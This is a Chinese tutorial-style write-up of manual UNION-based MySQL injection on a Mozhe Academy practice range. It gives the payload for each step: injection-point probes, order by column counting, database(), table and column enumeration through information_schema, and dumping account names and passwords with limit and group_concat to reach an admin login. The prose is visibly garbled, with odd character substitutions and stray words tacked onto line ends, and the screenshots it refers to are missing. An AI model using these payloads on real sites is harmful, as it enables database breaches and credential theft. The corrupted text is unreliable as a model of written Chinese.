手工注入——MySQL手工注入实战和分析

今天进行了MySQL手工注入实战,分享一下本身的实战过程和总结,这里环境使用的是墨者学院的在线靶场。话很少说,我们直接开始。数据库

第一步,判断注入点函数

经过 ' 和构造 and 1=1 和 and 1=2 查看页面是否报错。这里经过and 1=1 发现页面正常。以下图。测试

 

接下来,我们再构造 and 1=2 发现页面报错,说明页面存在注入点。以下图。spa

 

第二步,判断字段数3d

经过 order by 语句,若是后面输入的数字大于数据库的字段数,页面就会报错,经过这个,我们先输入 order by 4 发现页面正常。以下图。orm

 

接下来,我们输入 order by 5,发现页面报错,说明数据库中存在四个字段。以下图blog

 

第三步,爆库it

经过上一步,我们已经知道了有几个字段,接下来,我们经过联合查询,将 database() 依次替换1,2,3,4 看看哪一个位置会显示在页面中,经过测试发现,2,3,两个位置有回显。构造以下语句 union select 1,database(),user(),4 #     最后的#是注释符。结果以下图。注意:使用联合查询时,要使得前面不可查询 因此我把1替换成了-1 也能够直接在后面添加 and 1=2 两种方式均可以。io

 

 

第四步,爆表table

在上一步我们已经爆出了数据库名,接下来我们爆表名,在MySQL 5 和以后的版本,里面有一个information_schema表,这个表下面存放了数据库里面的全部表,接下来就能够查询啦,这里用到了group_concat()函数,我们构造以下语句 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=库名(库名转换成十六进制)结果以下图。

 

第五步,爆字段

上面我们查询出了表名,先用第一个表测试,接下来,爆字段,构造以下语句 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=表名(换成十六进制),结果以下图

 

第六步,爆帐号,密码。

经过上面,我们发现,有 name password 字段,通常帐号密码存放在里面。若是我们经过通常查询,会掉到坑里面,若是我们直接经过以下语句查询 union select 1,name,password,4 from 表名。发现爆出了帐号密码,而后高兴的去登录。发现尴尬了。去下图。

 

。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。

 

接下来该怎么办呢,其实只要只要在上一个的语句后面加一个 limit 语句 就搞定了,还可使用 group_concat() 函数 把上一句的 name 换成group_concat(name) 就能够啦 password 同理。这里使用了limit 语句 它的原理是 limit 0,1 是从第一行开始查询,查询一行。 limit 0,2 是从第一行开始查,查询两行。limit 1,2 是从第二行开始查询,查询两行。结果以下图。

查询出了第二个密码。帐号同理。成功登录后台。注入结束。

MySQL 手工注入总结

第一步,判断注入点,经过 ' 或者 and 1=1 和and 1=2第二步,判断字段数,经过 order by 语句。第三步,爆库,经过 union select 1,2,database(),4 #第四步,爆表,经过 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=库名(库名换成十六进制)第四步 爆字段,经过 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=表名(表名换成十六进制)第五步 爆帐号,密码,这里可使用 limit 语句,也可使用 group_concat()函数。上面演示了limit语句,若是用函数。经过语句 union select 1,group_concat(name),group_concat(password),4 from 表名。就能够直接获得两个帐号和密码。第六步 解密密码,登录。​

相关文章
相关标签/搜索